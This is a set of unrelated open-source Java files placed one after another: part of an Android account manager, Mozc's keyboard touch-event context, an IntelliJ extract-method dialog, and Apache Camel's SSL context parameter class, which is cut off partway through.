SettingsManager.instance().getCameraUploadAccountEmail(); String cameraUploadServer = SettingsManager.instance().getCameraUploadAccountServer(); if (camerUploadEmail == null) { return; } // stop camera upload service if (camerUploadEmail.equals(account.getEmail()) && cameraUploadServer.equals(account.getServer())) { Intent cameraUploadIntent = new Intent(ctx, CameraUploadService.class); ctx.stopService(cameraUploadIntent); } } /** * parse JSON format data * * @param accountInfo * @return AccountInfo * @throws JSONException */ public AccountInfo parseAccountInfo(String accountInfo) throws JSONException { JSONObject obj = Utils.parseJsonObject(accountInfo); if (obj == null) return null; return AccountInfo.fromJson(obj); } /** * get all email texts from database in order to auto complete email address * * @return */ public ArrayList<String> getAccountAutoCompleteTexts() { ArrayList<String> autoCompleteTexts = Lists.newArrayList(); List<Account> accounts = dbHelper.getAccountList(); if (accounts == null) return null; for (Account act : accounts) { if (!autoCompleteTexts.contains(act.getEmail())) autoCompleteTexts.add(act.getEmail()); } return autoCompleteTexts; } }
// Copyright 2010-2015, Google Inc. // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following disclaimer // in the documentation and/or other materials provided with the // distribution. // * Neither the name of Google Inc. nor the names of its // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. package org.mozc.android.inputmethod.japanese.keyboard; import org.mozc.android.inputmethod.japanese.keyboard.KeyState.MetaState; import org.mozc.android.inputmethod.japanese.protobuf.ProtoCommands.Input.TouchAction; import org.mozc.android.inputmethod.japanese.protobuf.ProtoCommands.Input.TouchEvent; import org.mozc.android.inputmethod.japanese.protobuf.ProtoCommands.Input.TouchPosition; import com.google.common.annotations.VisibleForTesting; import com.google.common.base.Optional; import com.google.common.base.Preconditions; import java.util.Set; /** * This class represents user's one action, e.g., the sequence of: * press -> move -> move -> ... -> move -> release. * * For user's multi touch events, multiple instances will be instantiated. * E.g. for user's two finger strokes, two instances will be instantiated. * */ public class KeyEventContext { final Key key; final int pointerId; private final float pressedX; private final float pressedY; private final float flickThresholdSquared; private final boolean isFlickableKey; private final Optional<KeyState> keyState; Flick.Direction flickDirection = Flick.Direction.CENTER; // TODO(hidehiko): Move logging code to an upper layer, e.g., MozcService or ViewManager etc. // after refactoring the architecture. private Optional<TouchAction> lastAction = Optional.absent(); private float lastX; private float lastY; private long lastTimestamp; private final int keyboardWidth; private final int keyboardHeight; // This variable will be updated in the callback of long press key event (if necessary). boolean pastLongPressSentTimeout = false; Optional<Runnable> longPressCallback = Optional.absent(); public KeyEventContext(Key key, int pointerId, float pressedX, float pressedY, int keyboardWidth, int keyboardHeight, float flickThresholdSquared, Set<MetaState> metaState) { Preconditions.checkNotNull(key); Preconditions.checkNotNull(metaState); this.key = key; this.pressedX = pressedX; this.pressedY = pressedY; this.flickThresholdSquared = flickThresholdSquared; this.isFlickableKey = isFlickable(key, metaState); this.keyState = key.getKeyState(metaState); this.pointerId = pointerId; this.keyboardWidth = keyboardWidth; this.keyboardHeight = keyboardHeight; } float getFlickThresholdSquared() { return flickThresholdSquared; } /** * Returns true iff the point ({@code x}, {@code y}) is contained by the {@code key}'s region. */ @VisibleForTesting static boolean isContained(float x, float y, Key key) { float relativeX = x - key.getX(); float relativeY = y - key.getY(); return 0 <= relativeX && relativeX < key.getWidth() && 0 <= relativeY && relativeY < key.getHeight(); } /** * Returns true iff the key is flickable. Otherwise returns false. */ @VisibleForTesting static boolean isFlickable(Key key, Set<MetaState> metaState) { Preconditions.checkNotNull(key); Preconditions.checkNotNull(metaState); Optional<KeyState> optionalKeyState = key.getKeyState(metaState); if (!optionalKeyState.isPresent()) { return false; } KeyState keyState = optionalKeyState.get(); return keyState.getFlick(Flick.Direction.LEFT).isPresent() || keyState.getFlick(Flick.Direction.UP).isPresent() || keyState.getFlick(Flick.Direction.RIGHT).isPresent() || keyState.getFlick(Flick.Direction.DOWN).isPresent(); } /** * Returns the key entity corresponding to {@code metaState} and {@code direction}. */ public static Optional<KeyEntity> getKeyEntity(Key key, Set<MetaState> metaState, Optional<Flick.Direction> direction) { Preconditions.checkNotNull(key); Preconditions.checkNotNull(metaState); Preconditions.checkNotNull(direction); if (key.isSpacer()) { return Optional.absent(); } // Key is not spacer for at least one KeyState is available. return getKeyEntityInternal(key.getKeyState(metaState).get(), direction); } private Optional<KeyEntity> getKeyEntity(Flick.Direction direction) { return keyState.isPresent() ? getKeyEntityInternal(keyState.get(), Optional.of(direction)) : Optional.<KeyEntity>absent(); } private static Optional<KeyEntity> getKeyEntityInternal(KeyState keyState, Optional<Flick.Direction> direction) { Preconditions.checkNotNull(keyState); Preconditions.checkNotNull(direction); if (!direction.isPresent()) { return Optional.absent(); } Optional<Flick> flick = keyState.getFlick(direction.get()); return flick.isPresent() ? Optional.of(flick.get().getKeyEntity()) : Optional.<KeyEntity>absent(); } /** * Returns the key code to be sent via {@link KeyboardActionListener#onKey(int, java.util.List)}. * <p> * If {@code keyEntyty} doesn't trigger longpress by timeout (isLongPressTimeoutTrigger is false), * the result depends on the timestamp of touch-down event. */ public int getKeyCode() { Optional<KeyEntity> keyEntity = getKeyEntity(flickDirection); if (!keyEntity.isPresent() || (pastLongPressSentTimeout && keyEntity.get().isLongPressTimeoutTrigger())) { // If the long-press-key event is already sent, just return INVALID_KEY_CODE. return KeyEntity.INVALID_KEY_CODE; } return !keyEntity.get().isLongPressTimeoutTrigger() && keyEntity.get().getLongPressKeyCode() != KeyEntity.INVALID_KEY_CODE && pastLongPressSentTimeout ? keyEntity.get().getLongPressKeyCode() : keyEntity.get().getKeyCode(); } Set<MetaState> getNextMetaStates(Set<MetaState> originalMetaStates) { Preconditions.checkNotNull(originalMetaStates); if (!key.isModifier() || key.isSpacer()) { // Non-modifier key shouldn't change meta state. return originalMetaStates; } return keyState.get().getNextMetaStates(originalMetaStates); } /** * Returns the key code to be sent for long press event. */ int getLongPressKeyCode() { if (pastLongPressSentTimeout) { // If the long-press-key event is already sent, just return INVALID_KEY_CODE. return KeyEntity.INVALID_KEY_CODE; } // Note that we always use CENTER flick direction for long press key events. Optional<KeyEntity> keyEntity = getKeyEntity(Flick.Direction.CENTER); return keyEntity.isPresent() ? keyEntity.get().getLongPressKeyCode() : KeyEntity.INVALID_KEY_CODE; } boolean isLongPressTimeoutTrigger() { Optional<KeyEntity> keyEntity = getKeyEntity(Flick.Direction.CENTER); return !keyEntity.isPresent() || keyEntity.get().isLongPressTimeoutTrigger(); } /** * Returns the key code to be send via {@link KeyboardActionListener#onPress(int)} and * {@link KeyboardActionListener#onRelease(int)}. */ public int getPressedKeyCode() { Optional<KeyEntity> keyEntity = getKeyEntity(Flick.Direction.CENTER); return keyEntity.isPresent() ? keyEntity.get().getKeyCode() : KeyEntity.INVALID_KEY_CODE; } /** * Returns true if this key event sequence represents toggling meta state. */ boolean isMetaStateToggleEvent() { return !pastLongPressSentTimeout && key.isModifier() && flickDirection == Flick.Direction.CENTER; } /** * Returns the pop up data for the current state. */ Optional<PopUp> getCurrentPopUp() { if (pastLongPressSentTimeout) { return Optional.absent(); } Optional<KeyEntity> keyEntity = getKeyEntity(flickDirection); return keyEntity.isPresent() ? keyEntity.get().getPopUp() : Optional.<PopUp>absent(); } /** * Updates the internal state of this context when the touched position is moved to * {@code (x, y)} at time {@code timestamp} in milliseconds since the press. * @return {@code true} if the internal state is actually updated. */ public boolean update(float x, float y, TouchAction touchAction, long timestamp) { lastAction = Optional.of(touchAction); Flick.Direction originalDirection = flickDirection; lastX = x; lastY = y; lastTimestamp = timestamp; float deltaX = x - pressedX; float deltaY = y - pressedY; if (deltaX * deltaX + deltaY * deltaY < flickThresholdSquared || !isFlickableKey && isContained(x, y, key)) { // A user touches (or returns back to) the same key, so we don't fire flick. // If the key isn't flickable, we also look at the key's region to avoid unexpected // cancellation. flickDirection = Flick.Direction.CENTER; } else { if (Math.abs(deltaX) < Math.abs(deltaY)) { // Vertical flick flickDirection = deltaY < 0 ? Flick.Direction.UP : Flick.Direction.DOWN; } else { // Horizontal flick flickDirection = deltaX > 0 ? Flick.Direction.RIGHT : Flick.Direction.LEFT; } } if (flickDirection == originalDirection) { return false; } else { // If flickDirection has been updated, reset pastLongPressSentTimeout flag // so that long-press even can be sent again. // This happens when // [Hold 'q' key] // -> [Popup '1' is shown as the result of long-press] // -> [Flick outside to dismiss the popup] // -> [Flick again to the center position and hold] // -> [Popup '1' is shown again as the result of long-press] pastLongPressSentTimeout = false; return true; } } /** * @return {@code TouchEvent} instance which includes the stroke related to this context. */ public Optional<TouchEvent> getTouchEvent() { Optional<KeyEntity> keyEntity = getKeyEntity(flickDirection); if (!keyEntity.isPresent()) { return Optional.absent(); } TouchEvent.Builder builder = TouchEvent.newBuilder() .setSourceId(keyEntity.get().getSourceId()); builder.addStroke(createTouchPosition( TouchAction.TOUCH_DOWN, pressedX, pressedY, keyboardWidth, keyboardHeight, 0)); if (lastAction.isPresent()) { builder.addStroke(createTouchPosition( lastAction.get(), lastX, lastY, keyboardWidth, keyboardHeight, lastTimestamp)); } return Optional.of(builder.build()); } public static TouchPosition createTouchPosition( TouchAction action, float x, float y, int width, int height, long timestamp) { return TouchPosition.newBuilder() .setAction(action) .setX(x / width) .setY(y / height) .setTimestamp(timestamp) .build(); } public void setLongPressCallback(Runnable longPressCallback) { this.longPressCallback = Optional.of(longPressCallback); } }
/* * Copyright 2000-2013 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.refactoring.extractMethod; import com.intellij.codeInsight.codeFragment.CodeFragment; import com.intellij.openapi.application.ApplicationManager; import com.intellij.openapi.fileTypes.FileType; import com.intellij.openapi.project.Project; import com.intellij.openapi.ui.DialogWrapper; import com.intellij.openapi.ui.Messages; import com.intellij.refactoring.RefactoringBundle; import com.intellij.refactoring.ui.ComboBoxVisibilityPanel; import com.intellij.refactoring.ui.MethodSignatureComponent; import com.intellij.refactoring.util.AbstractVariableData; import com.intellij.refactoring.util.SimpleParameterTablePanel; import com.intellij.ui.DocumentAdapter; import com.intellij.util.containers.HashMap; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import javax.swing.*; import javax.swing.event.DocumentEvent; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Map; public class AbstractExtractMethodDialog<T> extends DialogWrapper implements ExtractMethodSettings<T> { private JPanel myContentPane; private SimpleParameterTablePanel myParametersPanel; private JTextField myMethodNameTextField; private MethodSignatureComponent mySignaturePreviewTextArea; private JTextArea myOutputVariablesTextArea; private ComboBoxVisibilityPanel<T> myVisibilityComboBox; private final Project myProject; private final String myDefaultName; private final ExtractMethodValidator myValidator; private final ExtractMethodDecorator<T> myDecorator; private AbstractVariableData[] myVariableData; private Map<String, AbstractVariableData> myVariablesMap; private final List<String> myArguments; private final ArrayList<String> myOutputVariables; private final FileType myFileType; public AbstractExtractMethodDialog(final Project project, final String defaultName, final CodeFragment fragment, final T[] visibilityVariants, final ExtractMethodValidator validator, final ExtractMethodDecorator<T> decorator, final FileType type) { super(project, true); myProject = project; myDefaultName = defaultName; myValidator = validator; myDecorator = decorator; myFileType = type; myVisibilityComboBox = new ComboBoxVisibilityPanel<>(visibilityVariants); myVisibilityComboBox.setVisible(visibilityVariants.length > 1); $$$setupUI$$$(); myArguments = new ArrayList<>(fragment.getInputVariables()); Collections.sort(myArguments); myOutputVariables = new ArrayList<>(fragment.getOutputVariables()); Collections.sort(myOutputVariables); setModal(true); setTitle(RefactoringBundle.message("extract.method.title")); init(); } private void $$$setupUI$$$() { } @Override protected void init() { super.init(); // Set default name and select it myMethodNameTextField.setText(myDefaultName); myMethodNameTextField.setSelectionStart(0); myMethodNameTextField.setSelectionStart(myDefaultName.length()); myMethodNameTextField.getDocument().addDocumentListener(new DocumentAdapter() { @Override protected void textChanged(DocumentEvent e) { updateOutputVariables(); updateSignature(); updateOkStatus(); } }); myVariableData = createVariableDataByNames(myArguments); myVariablesMap = createVariableMap(myVariableData); myParametersPanel.init(myVariableData); updateOutputVariables(); updateSignature(); updateOkStatus(); } @Override public JComponent getPreferredFocusedComponent() { return myMethodNameTextField; } public static AbstractVariableData[] createVariableDataByNames(final List<String> args) { final AbstractVariableData[] datas = new AbstractVariableData[args.size()]; for (int i = 0; i < args.size(); i++) { final AbstractVariableData data = new AbstractVariableData(); final String name = args.get(i); data.originalName = name; data.name = name; data.passAsParameter = true; datas[i] = data; } return datas; } public static Map<String, AbstractVariableData> createVariableMap(final AbstractVariableData[] data) { final HashMap<String, AbstractVariableData> map = new HashMap<>(); for (AbstractVariableData variableData : data) { map.put(variableData.getOriginalName(), variableData); } return map; } @NotNull @Override protected Action[] createActions() { return new Action[]{getOKAction(), getCancelAction(), getHelpAction()}; } @Override protected void doOKAction() { final String error = myValidator.check(getMethodName()); if (error != null){ if (ApplicationManager.getApplication().isUnitTestMode()){ Messages.showInfoMessage(error, RefactoringBundle.message("error.title")); return; } if (Messages.showOkCancelDialog(error + ". " + RefactoringBundle.message("do.you.wish.to.continue"), RefactoringBundle.message("warning.title"), Messages.getWarningIcon()) != Messages.OK){ return; } } super.doOKAction(); } @Override protected String getHelpId() { return "refactoring.extractMethod"; } @Override protected JComponent createCenterPanel() { return myContentPane; } private void createUIComponents() { myParametersPanel = new SimpleParameterTablePanel(myValidator::isValidName) { @Override protected void doCancelAction() { AbstractExtractMethodDialog.this.doCancelAction(); } @Override protected void doEnterAction() { doOKAction(); } @Override protected void updateSignature() { updateOutputVariables(); AbstractExtractMethodDialog.this.updateSignature(); } }; mySignaturePreviewTextArea = new MethodSignatureComponent("", myProject, myFileType); } private void updateOutputVariables() { final StringBuilder builder = new StringBuilder(); boolean first = true; for (String variable : myOutputVariables) { if (myVariablesMap!=null){ final AbstractVariableData data = myVariablesMap.get(variable); final String outputName = data != null ? data.getName() : variable; if (first){ first = false; } else { builder.append(", "); } builder.append(outputName); } } myOutputVariablesTextArea.setText(builder.length() > 0 ? builder.toString() : RefactoringBundle.message("refactoring.extract.method.dialog.empty")); } private void updateSignature() { mySignaturePreviewTextArea.setSignature(myDecorator.createMethodSignature(this)); } private void updateOkStatus() { setOKActionEnabled(myValidator.isValidName(getMethodName())); } @NotNull @Override public String getMethodName() { return myMethodNameTextField.getText().trim(); } @NotNull @Override public AbstractVariableData[] getAbstractVariableData() { return myVariableData; } @Nullable @Override public T getVisibility() { return myVisibilityComboBox.getVisibility(); } }
/** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.camel.util.jsse; import java.io.IOException; import java.net.InetAddress; import java.net.ServerSocket; import java.net.Socket; import java.net.UnknownHostException; import java.security.GeneralSecurityException; import java.security.KeyManagementException; import java.security.SecureRandom; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.LinkedList; import java.util.List; import java.util.regex.Matcher; import java.util.regex.Pattern; import javax.net.ssl.KeyManager; import javax.net.ssl.SSLContext; import javax.net.ssl.SSLContextSpi; import javax.net.ssl.SSLEngine; import javax.net.ssl.SSLServerSocket; import javax.net.ssl.SSLServerSocketFactory; import javax.net.ssl.SSLSessionContext; import javax.net.ssl.SSLSocket; import javax.net.ssl.SSLSocketFactory; import javax.net.ssl.TrustManager; import org.apache.camel.util.jsse.FilterParameters.Patterns; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import static org.apache.camel.util.CollectionHelper.collectionAsCommaDelimitedString; /** * Represents configuration options that can be applied in the client-side * or server-side context depending on what they are applied to. */ public abstract class BaseSSLContextParameters extends JsseParameters { protected static final List<String> DEFAULT_CIPHER_SUITES_FILTER_INCLUDE = Collections.unmodifiableList(Arrays.asList(".*")); protected static final List<String> DEFAULT_CIPHER_SUITES_FILTER_EXCLUDE = Collections.unmodifiableList(Arrays.asList(".*_NULL_.*", ".*_anon_.*")); protected static final List<String> DEFAULT_SECURE_SOCKET_PROTOCOLS_FILTER_INCLUDE = Collections.unmodifiableList(Arrays.asList(".*")); private static final Logger LOG = LoggerFactory.getLogger(BaseSSLContextParameters.class); private static final String LS = System.getProperty("line.separator"); private static final String SSL_ENGINE_CIPHER_SUITE_LOG_MSG = createCipherSuiteLogMessage("SSLEngine"); private static final String SSL_SOCKET_CIPHER_SUITE_LOG_MSG = createCipherSuiteLogMessage("SSLSocket"); private static final String SSL_SERVER_SOCKET_CIPHER_SUITE_LOG_MSG = createCipherSuiteLogMessage("SSLServerSocket"); private static final String SSL_ENGINE_PROTOCOL_LOG_MSG = createProtocolLogMessage("SSLEngine"); private static final String SSL_SOCKET_PROTOCOL_LOG_MSG = createProtocolLogMessage("SSLSocket"); private static final String SSL_SERVER_SOCKET_PROTOCOL_LOG_MSG = createProtocolLogMessage("SSLServerSocket"); /** * The optional explicitly configured cipher suites for this configuration. */ private CipherSuitesParameters cipherSuites; /** * The optional cipher suite filter configuration for this configuration. */ private FilterParameters cipherSuitesFilter; /** * The optional explicitly configured secure socket protocol names for this configuration. */ private SecureSocketProtocolsParameters secureSocketProtocols; /** * The option secure socket protocol name filter configuration for this configuration. */ private FilterParameters secureSocketProtocolsFilter; /** * The optional {@link SSLSessionContext} timeout time for {@link javax.net.ssl.SSLSession}s in seconds. */ private String sessionTimeout; /** * Returns the optional explicitly configured cipher suites for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values override any filters supplied in {@link #setCipherSuitesFilter(FilterParameters)} */ public CipherSuitesParameters getCipherSuites() { return cipherSuites; } /** * Sets the optional explicitly configured cipher suites for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values override any filters supplied in {@link #setCipherSuitesFilter(FilterParameters)} * * @param cipherSuites the suite configuration */ public void setCipherSuites(CipherSuitesParameters cipherSuites) { this.cipherSuites = cipherSuites; } /** * Returns the optional cipher suite filter for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values are ignored if {@link #setCipherSuites(CipherSuitesParameters)} is * called with a non {@code null} argument. */ public FilterParameters getCipherSuitesFilter() { return cipherSuitesFilter; } /** * Sets the optional cipher suite filter for this JSSE configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values are ignored if {@link #setCipherSuites(CipherSuitesParameters)} is * called with a non {@code null} argument. * * @param cipherSuitesFilter the filter configuration */ public void setCipherSuitesFilter(FilterParameters cipherSuitesFilter) { this.cipherSuitesFilter = cipherSuitesFilter; } /** * Returns the explicitly configured secure socket protocol names for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values override any filters supplied in {@link #setSecureSocketProtocolsFilter(FilterParameters)} */ public SecureSocketProtocolsParameters getSecureSocketProtocols() { return secureSocketProtocols; } /** * Sets the explicitly configured secure socket protocol names for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values override any filters supplied in {@link #setSecureSocketProtocolsFilter(FilterParameters)} */ public void setSecureSocketProtocols(SecureSocketProtocolsParameters secureSocketProtocols) { this.secureSocketProtocols = secureSocketProtocols; } /** * Returns the optional secure socket protocol filter for this configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values are ignored if {@link #setSecureSocketProtocols(SecureSocketProtocolsParameters)} is * called with a non-{@code null} argument. */ public FilterParameters getSecureSocketProtocolsFilter() { return secureSocketProtocolsFilter; } /** * Sets the optional secure socket protocol filter for this JSSE configuration. * These options are used in the configuration of {@link SSLEngine}, * {@link SSLSocketFactory} and {@link SSLServerSocketFactory} depending * on the context in which they are applied. * <p/> * These values are ignored if {@link #setSecureSocketProtocols(SecureSocketProtocolsParameters)} is * called with a non-{@code null} argument. * * @param secureSocketProtocolsFilter the filter configuration */ public void setSecureSocketProtocolsFilter(FilterParameters secureSocketProtocolsFilter) { this.secureSocketProtocolsFilter = secureSocketProtocolsFilter; } /** * Returns the optional {@link SSLSessionContext} timeout time for {@link javax.net.ssl.SSLSession}s * in seconds. */ public String getSessionTimeout() { return sessionTimeout; } /** * Sets the optional {@link SSLSessionContext} timeout time for {@link javax.net.ssl.SSLSession}s * in seconds. * * @param sessionTimeout the timeout value or {@code null} to use the default */ public void setSessionTimeout(String sessionTimeout) { this.sessionTimeout = sessionTimeout; } /** * Returns a flag indicating if default values should be applied in the event that no other property * of the instance configures a particular aspect of the entity produced by the instance. * This flag is used to allow instances of this class to produce a configurer that simply * passes through the current configuration of a configured entity when the instance of this * class would otherwise only apply some default configuration. * * @see SSLContextClientParameters * @see SSLContextServerParameters */ protected boolean getAllowPassthrough() { return false; } /** * Configures the actual {@link SSLContext} itself with direct setter calls. This method differs from * configuration options that are handled by a configurer instance in that the options are part of the * context itself and are not part of some factory or instance object returned by the context. * * @param context the context to configure * * @throws GeneralSecurityException if there is an error configuring the context */ protected void configureSSLContext(SSLContext context) throws GeneralSecurityException { LOG.trace("Configuring client and server side SSLContext parameters on SSLContext [{}]...", context); if (this.getSessionTimeout() != null) { LOG.debug("Configuring client and server side SSLContext session timeout on SSLContext [{}] to [{}]", context, this.getSessionTimeout()); this.configureSessionContext(context.getClientSessionContext(), this.getSessionTimeout()); this.configureSessionContext(context.getServerSessionContext(), this.getSessionTimeout()); } LOG.trace("Configured client and server side SSLContext parameters on SSLContext [{}].", context); } protected FilterParameters getDefaultCipherSuitesFilter() { FilterParameters filter = new FilterParameters(); filter.getInclude().addAll(DEFAULT_CIPHER_SUITES_FILTER_INCLUDE); filter.getExclude().addAll(DEFAULT_CIPHER_SUITES_FILTER_EXCLUDE); return filter; } protected FilterParameters getDefaultSecureSocketProcotolFilter() { FilterParameters filter = new FilterParameters(); filter.getInclude().addAll(DEFAULT_SECURE_SOCKET_PROTOCOLS_FILTER_INCLUDE); return filter; } /** * Returns the list of configurers to apply to an {@link SSLEngine} in order * to fully configure it in compliance with the provided configuration options. * The configurers are to be applied in the order in which they appear in the list. * * @param context the context that serves as the factory for {@code SSLEngine} instances * * @return the needed configurers */ protected List<Configurer<SSLEngine>> getSSLEngineConfigurers(SSLContext context) { final List<String> enabledCipherSuites = this.getCipherSuites() == null ? null : this.parsePropertyValues(this.getCipherSuites().getCipherSuite()); final Patterns enabledCipherSuitePatterns; final Patterns defaultEnabledCipherSuitePatterns = this.getDefaultCipherSuitesFilter().getPatterns(); if (this.getCipherSuitesFilter() != null) { enabledCipherSuitePatterns = this.getCipherSuitesFilter().getPatterns(); } else { enabledCipherSuitePatterns = null; } /// final List<String> enabledSecureSocketProtocols = this.getSecureSocketProtocols() == null ? null : this.parsePropertyValues(this.getSecureSocketProtocols().getSecureSocketProtocol()); final Patterns enabledSecureSocketProtocolsPatterns; final Patterns defaultEnabledSecureSocketProtocolsPatterns = this.getDefaultSecureSocketProcotolFilter().getPatterns(); if (this.getSecureSocketProtocolsFilter() != null) { enabledSecureSocketProtocolsPatterns = this.getSecureSocketProtocolsFilter().getPatterns(); } else { enabledSecureSocketProtocolsPatterns = null; } // final boolean allowPassthrough = getAllowPassthrough(); ////// Configurer<SSLEngine> sslEngineConfigurer = new Configurer<SSLEngine>() { @Override public SSLEngine configure(SSLEngine engine) { Collection<String> filteredCipherSuites = BaseSSLContextParameters.this .filter(enabledCipherSuites, Arrays.asList(engine.getSSLParameters().getCipherSuites()), Arrays.asList(engine.getEnabledCipherSuites()), enabledCipherSuitePatterns, defaultEnabledCipherSuitePatterns, !allowPassthrough); if (LOG.isDebugEnabled()) { LOG.debug(SSL_ENGINE_CIPHER_SUITE_LOG_MSG, new Object[] {engine, enabledCipherSuites, enabledCipherSuitePatterns, engine.getSSLParameters().getCipherSuites(), engine.getEnabledCipherSuites(), defaultEnabledCipherSuitePatterns, filteredCipherSuites}); } engine.setEnabledCipherSuites(filteredCipherSuites.toArray(new String[filteredCipherSuites.size()])); Collection<String> filteredSecureSocketProtocols = BaseSSLContextParameters.this .filter(enabledSecureSocketProtocols, Arrays.asList(engine.getSSLParameters().getProtocols()), Arrays.asList(engine.getEnabledProtocols()), enabledSecureSocketProtocolsPatterns, defaultEnabledSecureSocketProtocolsPatterns, !allowPassthrough); if (LOG.isDebugEnabled()) { LOG.debug(SSL_ENGINE_PROTOCOL_LOG_MSG, new Object[] {engine, enabledSecureSocketProtocols, enabledSecureSocketProtocolsPatterns, engine.getSSLParameters().getProtocols(), engine.getEnabledProtocols(), defaultEnabledSecureSocketProtocolsPatterns, filteredSecureSocketProtocols}); } engine.setEnabledProtocols(filteredSecureSocketProtocols.toArray(new String[filteredSecureSocketProtocols.size()])); return engine; } }; List<Configurer<SSLEngine>> sslEngineConfigurers = new LinkedList<Configurer<SSLEngine>>(); sslEngineConfigurers.add(sslEngineConfigurer); return sslEngineConfigurers; } /** * Returns the list of configurers to apply to an {@link SSLSocketFactory} in order * to fully configure it in compliance with the provided configuration options. * The configurers are to be applied in the order in which they appear in the list. * <p/> * It is preferred to use {@link #getSSLSocketFactorySSLSocketConfigurers(SSLContext)} instead * of this method as {@code SSLSocketFactory} does not contain any configuration options that * are non-proprietary. * * @param context the context that serves as the factory for {@code SSLSocketFactory} instances * * @return the needed configurers * * @see #getSSLSocketFactorySSLSocketConfigurers(SSLContext) */ protected List<Configurer<SSLSocketFactory>> getSSLSocketFactoryConfigurers(SSLContext context) { final List<Configurer<SSLSocket>> sslSocketConfigurers = this.getSSLSocketFactorySSLSocketConfigurers(context); Configurer<SSLSocketFactory> sslSocketFactoryConfigurer = new Configurer<SSLSocketFactory>() { @Override public SSLSocketFactory configure(SSLSocketFactory factory) { return new SSLSocketFactoryDecorator( factory, sslSocketConfigurers); } }; List<Configurer<SSLSocketFactory>> sslSocketFactoryConfigurers = new LinkedList<Configurer<SSLSocketFactory>>(); sslSocketFactoryConfigurers.add(sslSocketFactoryConfigurer); return sslSocketFactoryConfigurers; } /** * Returns the list of configurers to apply to an {@link SSLServerSocketFactory} in order * to fully configure it in compliance with the provided configuration options. * The configurers are to be applied in the order in which they appear in the list. * <p/> * It is preferred to use {@link #getSSLServerSocketFactorySSLServerSocketConfigurers(SSLContext)} instead * of this method as {@code SSLServerSocketFactory} does not contain any configuration options that * are non-proprietary. * * @param context the context that serves as the factory for {@code SSLServerSocketFactory} instances * * @return the needed configurers * * @see #getSSLServerSocketFactorySSLServerSocketConfigurers(SSLContext) */ protected List<Configurer<SSLServerSocketFactory>> getSSLServerSocketFactoryConfigurers(SSLContext context) { final List<Configurer<SSLServerSocket>> sslServerSocketConfigurers = this.getSSLServerSocketFactorySSLServerSocketConfigurers(context); Configurer<SSLServerSocketFactory> sslServerSocketFactoryConfigurer = new Configurer<SSLServerSocketFactory>() { @Override public SSLServerSocketFactory configure(SSLServerSocketFactory factory) { return new SSLServerSocketFactoryDecorator( factory, sslServerSocketConfigurers); } }; List<Configurer<SSLServerSocketFactory>> sslServerSocketFactoryConfigurers = new LinkedList<Configurer<SSLServerSocketFactory>>(); sslServerSocketFactoryConfigurers.add(sslServerSocketFactoryConfigurer); return sslServerSocketFactoryConfigurers; } /** * Returns the list of configurers to apply to an {@link SSLSocket} in order * to fully configure it in compliance with the provided configuration * options. These configurers are intended for sockets produced by a * {@link SSLSocketFactory}, see * {@link #getSSLServerSocketFactorySSLServerSocketConfigurers(SSLContext)} for * configurers related to sockets produced by a * {@link SSLServerSocketFactory}. The configurers are to be applied in * the order in which they appear in the list. * * @param context the context that serves as the factory for * {@code SSLSocketFactory} instances * * @return the needed configurers */ protected 